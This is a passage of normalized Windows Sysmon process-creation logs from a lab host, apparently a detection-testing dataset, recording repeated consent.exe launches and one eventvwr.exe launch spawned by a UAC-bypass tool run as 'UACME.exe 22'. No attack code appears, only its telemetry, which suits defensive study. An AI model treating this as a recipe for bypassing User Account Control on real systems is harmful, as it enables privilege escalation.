12:08:16.399\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-7930-5d45-0000-001055de0601}\"},{\"Name\":\"ProcessId\",\"text\":\"4740\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Consent UI for administrative applications\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"consent.exe 896 318 0000028064471300\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-d4e9-5d45-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=9329B2362078DE27242DD4534F588AF3264BF0BF,MD5=27992D7EBE51AEC655A088DE88BAD5C9,SHA256=8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6,IMPHASH=522D83761201075834F05037F5307949\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-5769-5d45-0000-001044e83300}\"},{\"Name\":\"ParentProcessId\",\"text\":\"896\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Appinfo\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-d4e9-5d45-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "consent.exe 896 318 0000028064471300", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.guid": "747f3d96-7930-5d45-0000-001055de0601", "object.process.hash.imphash": "522D83761201075834F05037F5307949", "object.process.hash.md5": "27992D7EBE51AEC655A088DE88BAD5C9", "object.process.hash.sha1": "9329B2362078DE27242DD4534F588AF3264BF0BF", "object.process.hash.sha256": "8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6", "object.process.id": "4740", "object.process.meta": "Description:Consent UI for administrative applications | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "consent.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Appinfo", "object.process.parent.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.parent.guid": "747f3d96-5769-5d45-0000-001044e83300", "object.process.parent.id": "896", "object.process.parent.name": "svchost.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.267Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:16.399Z", "type": "raw", "uuid": "2a8d15ba-ff8a-4709-b122-f4121ea80dd1"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:16.7215806Z\"},\"EventRecordID\":\"5443\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:16.350\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-7930-5d45-0000-001027dc0601}\"},{\"Name\":\"ProcessId\",\"text\":\"4604\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\eventvwr.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Event Viewer Snapin Launcher\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\eventvwr.exe\\\" \"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Users\\\\IEUser\\\\Desktop\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-56a3-5d45-0000-0020fbd31800}\"},{\"Name\":\"LogonId\",\"text\":\"0x18d3fb\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"Medium\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=1AF3BB8D63A0ED48DF1F1706B791404DEE28524F,MD5=43129C3BFC9746CE9FFE8E45D10FE050,SHA256=BC87E4F462F00B826EC09AC16B625D0F70439C48FC04A52A41B4CD9E78401F70,IMPHASH=5843AE9886BB500E05E07EE59BB5AD42\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-792d-5d45-0000-00104f190601}\"},{\"Name\":\"ParentProcessId\",\"text\":\"5336\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Users\\\\IEUser\\\\Desktop\\\\UACME.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"UACME.exe 22\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-56a3-5d45-0000-0020fbd31800", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "Medium", "object.account.session_id": "1627131", "object.process.cmdline": "\"C:\\Windows\\system32\\eventvwr.exe\"", "object.process.cwd": "C:\\Users\\IEUser\\Desktop\\", "object.process.fullpath": "c:\\windows\\system32\\eventvwr.exe", "object.process.guid": "747f3d96-7930-5d45-0000-001027dc0601", "object.process.hash.imphash": "5843AE9886BB500E05E07EE59BB5AD42", "object.process.hash.md5": "43129C3BFC9746CE9FFE8E45D10FE050", "object.process.hash.sha1": "1AF3BB8D63A0ED48DF1F1706B791404DEE28524F", "object.process.hash.sha256": "BC87E4F462F00B826EC09AC16B625D0F70439C48FC04A52A41B4CD9E78401F70", "object.process.id": "4604", "object.process.meta": "Description:Event Viewer Snapin Launcher | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "eventvwr.exe", "object.process.parent.cmdline": "UACME.exe 22", "object.process.parent.fullpath": "c:\\users\\ieuser\\desktop\\uacme.exe", "object.process.parent.guid": "747f3d96-792d-5d45-0000-00104f190601", "object.process.parent.id": "5336", "object.process.parent.name": "uacme.exe", "object.process.parent.path": "c:\\users\\ieuser\\desktop\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.267Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "Medium", "subject.account.session_id": "1627131", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:16.350Z", "type": "raw", "uuid": "46a33b2f-ec5a-47cd-b6c0-98543e66a016"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:15.6646074Z\"},\"EventRecordID\":\"5442\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:15.660\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-792f-5d45-0000-00103da80601}\"},{\"Name\":\"ProcessId\",\"text\":\"2388\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Consent UI for administrative applications\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"consent.exe 896 272 00000280644BC170\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-d4e9-5d45-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=9329B2362078DE27242DD4534F588AF3264BF0BF,MD5=27992D7EBE51AEC655A088DE88BAD5C9,SHA256=8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6,IMPHASH=522D83761201075834F05037F5307949\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-5769-5d45-0000-001044e83300}\"},{\"Name\":\"ParentProcessId\",\"text\":\"896\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Appinfo\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-d4e9-5d45-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "consent.exe 896 272 00000280644BC170", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.guid": "747f3d96-792f-5d45-0000-00103da80601", "object.process.hash.imphash": "522D83761201075834F05037F5307949", "object.process.hash.md5": "27992D7EBE51AEC655A088DE88BAD5C9", "object.process.hash.sha1": "9329B2362078DE27242DD4534F588AF3264BF0BF", "object.process.hash.sha256": "8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6", "object.process.id": "2388", "object.process.meta": "Description:Consent UI for administrative applications | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "consent.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Appinfo", "object.process.parent.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.parent.guid": "747f3d96-5769-5d45-0000-001044e83300", "object.process.parent.id": "896", "object.process.parent.name": "svchost.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.267Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:15.660Z", "type": "raw", "uuid": "4e1d5f0f-b3c3-429c-9ef4-1346dd1497c0"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:14.9773218Z\"},\"EventRecordID\":\"5441\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:14.972\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-792e-5d45-0000-00104a760601}\"},{\"Name\":\"ProcessId\",\"text\":\"8072\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Consent UI for administrative applications\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"consent.exe 896 272 00000280644BC890\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-d4e9-5d45-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=9329B2362078DE27242DD4534F588AF3264BF0BF,MD5=27992D7EBE51AEC655A088DE88BAD5C9,SHA256=8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6,IMPHASH=522D83761201075834F05037F5307949\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-5769-5d45-0000-001044e83300}\"},{\"Name\":\"ParentProcessId\",\"text\":\"896\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Appinfo\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-d4e9-5d45-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "consent.exe 896 272 00000280644BC890", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.guid": "747f3d96-792e-5d45-0000-00104a760601", "object.process.hash.imphash": "522D83761201075834F05037F5307949", "object.process.hash.md5": "27992D7EBE51AEC655A088DE88BAD5C9", "object.process.hash.sha1": "9329B2362078DE27242DD4534F588AF3264BF0BF", "object.process.hash.sha256": "8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6", "object.process.id": "8072", "object.process.meta": "Description:Consent UI for administrative applications | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "consent.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Appinfo", "object.process.parent.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.parent.guid": "747f3d96-5769-5d45-0000-001044e83300", "object.process.parent.id": "896", "object.process.parent.name": "svchost.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.267Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:14.972Z", "type": "raw", "uuid": "e547ebd6-7c5c-43f5-976a-3338e6f9d1e8"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:14.3727351Z\"},\"EventRecordID\":\"5440\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:14.368\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-792e-5d45-0000-001001560601}\"},{\"Name\":\"ProcessId\",\"text\":\"6716\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Consent UI for administrative applications\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"consent.exe 896 272 00000280644BC9C0\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-d4e9-5d45-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=9329B2362078DE27242DD4534F588AF3264BF0BF,MD5=27992D7EBE51AEC655A088DE88BAD5C9,SHA256=8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6,IMPHASH=522D83761201075834F05037F5307949\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-5769-5d45-0000-001044e83300}\"},{\"Name\":\"ParentProcessId\",\"text\":\"896\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Appinfo\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-d4e9-5d45-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "consent.exe 896 272 00000280644BC9C0", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.guid": "747f3d96-792e-5d45-0000-001001560601", "object.process.hash.imphash": "522D83761201075834F05037F5307949", "object.process.hash.md5": "27992D7EBE51AEC655A088DE88BAD5C9", "object.process.hash.sha1": "9329B2362078DE27242DD4534F588AF3264BF0BF", "object.process.hash.sha256": "8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6", "object.process.id": "6716", "object.process.meta": "Description:Consent UI for administrative applications | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "consent.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Appinfo", "object.process.parent.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.parent.guid": "747f3d96-5769-5d45-0000-001044e83300", "object.process.parent.id": "896", "object.process.parent.name": "svchost.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.267Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:14.368Z", "type": "raw", "uuid": "15801084-49e4-410f-8731-2d4fc0090ea9"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:13.8748883Z\"},\"EventRecordID\":\"5439\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:13.760\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-792d-5d45-0000-00107a250601}\"},{\"Name\":\"ProcessId\",\"text\":\"7472\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Consent UI for administrative applications\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"consent.exe 896 272 00000280644BC3D0\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-d4e9-5d45-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=9329B2362078DE27242DD4534F588AF3264BF0BF,MD5=27992D7EBE51AEC655A088DE88BAD5C9,SHA256=8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6,IMPHASH=522D83761201075834F05037F5307949\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-5769-5d45-0000-001044e83300}\"},{\"Name\":\"ParentProcessId\",\"text\":\"896\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Appinfo\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-d4e9-5d45-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "consent.exe 896 272 00000280644BC3D0", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.guid": "747f3d96-792d-5d45-0000-00107a250601", "object.process.hash.imphash": "522D83761201075834F05037F5307949", "object.process.hash.md5": "27992D7EBE51AEC655A088DE88BAD5C9", "object.process.hash.sha1": "9329B2362078DE27242DD4534F588AF3264BF0BF", "object.process.hash.sha256": "8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6", "object.process.id": "7472", "object.process.meta": "Description:Consent UI for administrative applications | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "consent.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Appinfo", "object.process.parent.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.parent.guid": "747f3d96-5769-5d45-0000-001044e83300", "object.process.parent.id": "896", "object.process.parent.name": "svchost.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.267Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", 